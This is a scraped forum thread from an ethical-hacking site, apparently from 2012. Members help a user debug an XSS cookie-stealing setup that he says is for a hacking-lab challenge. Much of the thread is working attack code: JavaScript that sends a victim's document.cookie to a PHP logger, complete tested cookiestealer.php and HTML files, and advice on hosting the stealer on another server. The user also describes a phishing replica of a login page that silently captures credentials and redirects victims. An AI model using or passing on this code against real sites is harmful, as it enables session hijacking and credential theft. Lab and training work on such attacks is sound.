HomeCalendarCertificationsColumnsFeaturesForumResourcesVitals
 
Image
 
linkedin_logo.png rss_logo.jpg
twitter_logo.png youtube_logo.jpg
Latest Additions
 
EH-Net Login
Welcome Guest.
Lost Password?
No account yet? Register
Who's Online
We have 62 guests and 1 member online
 
Advertisement

You are here: Home arrow Ethical Hacking Discussions and Related Certificationsarrow Network Pen Testingarrow need a little help with a cookie grab script...
EH-Net
May 22, 2013, 10:16:57 AM *
Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
News: Go back to The Ethical Hacker Network Online Magazine Home Page
 
   Home   Help Calendar Login Register  
Pages: [1]   Go Down
« previous next »
  Print  
Author Topic: need a little help with a cookie grab script...  (Read 4111 times)
0 Members and 1 Guest are viewing this topic.
wlandymore
Newbie
*
Offline Offline

Posts: 34


View Profile
« on: April 06, 2012, 01:15:08 PM »
Hey, I'm testing something out on my local machine and it seems like it's working 95% but I can't get it to write my cookies to the file I've set for it. I have a php script on my server with a text file it can write to and then I'm loading an html file with the <script> in the header.

So I have:
<html>
<head>
<script language="JavaScript">document.location= "win.php?c=" + document.cookie$
</head>
<body>
This page is a test
</body>
</html>

And then that goes to my php file:
<?php
$cookie = $HTTP_GET_VARS["c"];
$file = fopen('cookielog.txt', 'a');
fwrite($file, $cookie . "\n\n");
echo "<script>location.href='http://www.google.com';</script>";
?>

So this seems to work on the surface because it's redirecting me to google like I wanted, but it won't write the cookie information from the browser to the "cookielog.txt" file that's in the same directory.

Can anyone see what I'm missing?
Logged
ajohnson
Recruiters
Hero Member
*
Offline Offline

Posts: 1057


aka dynamik


View Profile WWW
« Reply #1 on: April 06, 2012, 01:42:49 PM »
Are you ever setting a cookie?

What do you see when you load this html page in a browser?

Code:
<html>
<head>
<script language="JavaScript">alert(document.cookie)</script>
</head>
<body>
This page is a test
</body>
</html>

Also, I assume the $ in your code is supposed to be </script>. It doesn't look like that pasted correctly.
Logged
WIP: GCFA | www.infosiege.net | @infosiege

The day you stop learning is the day you start becoming obsolete.
wlandymore
Newbie
*
Offline Offline

Posts: 34


View Profile
« Reply #2 on: April 06, 2012, 03:01:43 PM »
I got the pop up window and then when you click 'ok' it disappears and you see the 'test' message.

Yeah, that $ was because I was in 'nano' and the line hadn't wrapped. The code should be:

<html>
<head>
<script language="JavaScript">document.location= "win.php?c=" + document.cookie;</script>
</head>
<body>

This page is a test

</body>
</html>

I had that same code you used to test it out first and this OS i'm using is vulnerable to this type of code where I would be able to swipe the cookies from the browser and then write them to a file, but I'm missing something. I got it working where it was writing out the string with the IP and then cookie= (and it wouldn't write a cookie because I'm not giving it one), but when I went to the URL that had cookies it did the same thing.

Right now with my current code the forwarding is working but it won't pop open the cookielog.txt file and write the information in there that I need...
« Last Edit: April 06, 2012, 03:07:10 PM by wlandymore » Logged
ajohnson
Recruiters
Hero Member
*
Offline Offline

Posts: 1057


aka dynamik


View Profile WWW
« Reply #3 on: April 06, 2012, 03:14:29 PM »
$HTTP_GET_VARS might work differently. It's been deprecated and replaced with $_GET.

Code:
<html>
<head>
<script language="JavaScript">
document.cookie="test=1234";
document.location= "win.php?c=" + document.cookie
</script>
</head>
<body>
This page is a test
</body>
</html>



<?php
$cookie $_GET["c"];
$file fopen('cookielog.txt''a');
fwrite($file$cookie "\n\n");
echo "<script>location.href='http://www.google.com';</script>";
?>



cookielog.txt:

test=1234

Edit: it looks like $HTTP_GET_VARS has been disabled by default since 5.0.3. In the future, try using print_r($array) to troubleshoot; that'll give you a quick peak at everything that's in $_POST, $_GET, or $_REQUEST (both combined).
« Last Edit: April 06, 2012, 03:22:25 PM by ajohnson » Logged
WIP: GCFA | www.infosiege.net | @infosiege

The day you stop learning is the day you start becoming obsolete.
wlandymore
Newbie
*
Offline Offline

Posts: 34


View Profile
« Reply #4 on: April 06, 2012, 04:12:42 PM »
it definitely writes the 1234 to the file if it's defined explicitly, but if you don't have that there it won't scrape out the session cookie like I need. I'll keep on messing around with it and see if I can get more information in the file.

Thanks.
Logged
ajohnson
Recruiters
Hero Member
*
Offline Offline

Posts: 1057


aka dynamik


View Profile WWW
« Reply #5 on: April 06, 2012, 04:43:31 PM »
Where is the session cookie coming from?

Are you going across domain boundaries?
Logged
WIP: GCFA | www.infosiege.net | @infosiege

The day you stop learning is the day you start becoming obsolete.
wlandymore
Newbie
*
Offline Offline

Posts: 34


View Profile
« Reply #6 on: April 06, 2012, 09:00:15 PM »
yeah, it would be I guess.

It works if I go to the message board and put in:
<SCRIPT>alert(document.cookie);</SCRIPT>

and then post it. It will show me the cookie session etc, but I need some way really to use just javascript to then write this to a file or something. That's what I was trying to do before because I just have a little test site setup and then I'm trying to capture the cookie and send it out to that other file. Basically taking the cookie from the session on tespage.com and then sending it to capture.com.

I would totally agree that normally this shouldn't be possible but in this case I'm attacking a server that I know is vulnerable...
Logged
wlandymore
Newbie
*
Offline Offline

Posts: 34


View Profile
« Reply #7 on: April 07, 2012, 09:55:41 PM »
what about a POST method?

So if I get a valid session and then click on a link that's embedded into that site which takes me to the malicious site that loads a POST method right away going back to the original site to get the cookie...would that work?

And if so, what kind of options would I have for getting this to work?
Logged
gromic
Newbie
*
Offline Offline

Posts: 38



View Profile
« Reply #8 on: April 08, 2012, 06:41:27 AM »
Hi wlandymore, hi ajohnson

The following code (cookie_site.html and cookiestealer.php  ) should work (Seems that you just missed a / before your stealer script redirect in your html page).

I tested it via a xampp setup and it worked.

Just throw both of the files into your XAMPP htdocs.

file: cookie_site.html
Code:
<html>
    <head>
    <script type="text/javascript"> document.cookie = "Test123";</script>
    </head>
  <body>
    This page is a test
    <script> alert(document.cookie)</script>
    <script> document.location = "/cookiestealer.php?cookie=" + document.cookie; </script>
  </body>
</html>

file: cookiestealer.php
Code:
<?php
  $cookie $_GET['cookie'];
  $log fopen("cookielog.txt""a");
  fwrite($log$cookie ."\n");
  fclose($log);
?>

Note:
  • So far, page and stealer.php run on the same server (I know...not intended). When you move your stealer.php to another server you have to adjust your path i.e. “http://<Server IP >/cookiestealer.php?cookie=” … and so on..
  • One more tip: When debugging your scripts make sure you delete your browsers cache each time... very often I changed something but my browser (Chrome) showed me still the old results  Grin
  • cross domain issues should't be a problem since as far as I understood the idea was to place the "stealer script" on a site which is vuln to XSS and steal the cookies related to THIS site, right? If you want to read cookies of another domain you run into "same orgin" issues..
Hope this helps and works for you.
Logged
Thinking .... Please Wait...
MaXe
Hero Member
*****
Offline Offline

Posts: 669


I've just upgraded myself to a cyborg muahahaa!!1


View Profile WWW
« Reply #9 on: April 08, 2012, 09:33:48 AM »
Okay here's a few things you should make sure of.

1. Since you're using fopen(), in some cases (but not this), make sure you read the "manual" http://php.net/manual/en/function.fopen.php (People tend to set the wrong "flag", but 'a' is 100% correct in this case.

2. If the cookielog.txt file isn't created, what are the permissions for that particular directory? (644 would most likely not work, 755 would work, but this depends on who is set to own the directory as well.)
If the file is created, is the file cookielog.txt set to be writeable? (Otherwise nothing will be written to this file.)

3. More importantly, is the cookie you're trying to steal, httpOnly? Can you read it with alert(document.cookie) ? If yes, you should be able to steal it too then.

4. document.location = "/cookiestealer.php?cookie=" + document.cookie;
Make sure to include the full path, do not use "/cookiestealer.php" unless you're on the exact same server AND directory. Otherwise, you may end up trying to write to the wrong file. Use an intercepting proxy to see if your HTTP requests are going the right place.

Even though it seems like you did everything right, except perhaps giving cookielog.txt the right file permissions, or that the cookies could be httpOnly. (I haven't read all of the replies, sorry. Smiley )
Logged
I'm an InterN0T'er
wlandymore
Newbie
*
Offline Offline

Posts: 34


View Profile
« Reply #10 on: April 08, 2012, 07:59:25 PM »
Hey, thanks for all the tips guys.

I ended up doing something slightly different last night because I couldn't make this one work at the time. I actually created a replica of the site itself and then posted the link to the forum like before. This said there was a problem with their login, except in this case I was using a POST method on the form to post it to the file. It worked well and then I was able to do it in the background and direct the user to the new site that the link was supposed to be for, all invisible to the 'victim'.

This was part of a hacking-lab challenge so I don't know if they'll be okay with that route but it seems like it's doing exactly the same thing because I'm forwarding the victim to my site, getting the information and then sending them on.

However, I'll still give the tips you posted a try so I'm familiar with that way too. Thanks again.
Logged
Pages: [1]   Go Up
  Print  
« previous next »
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.18 | SMF © 2013, Simple Machines
Joomla Bridge by JoomlaHacks.com 		Valid XHTML 1.0! Valid CSS!
Page created in 0.076 seconds with 23 queries.
 
Exclusive Deal

sansfire13_245x90_cw90.jpg
SANSFIRE 2013
June 15 - 22

5% Off w/ Code: EHN_5

SANS Deals 4 EH-Netters
5% OFF Any SANS Course in Any Format!
Coupon Code: EHN_5 Including SANS Rocky Mountain 2013 & SANS Boston 2013
Polls
Compared to this year, 2013 will be:
 
Recent Forum Topics
EH-Net News Feeds
Latest Additions
 
         
Advertisement

© 2013 The Ethical Hacker Network
Joomla! is Free Software released under the GNU/GPL License.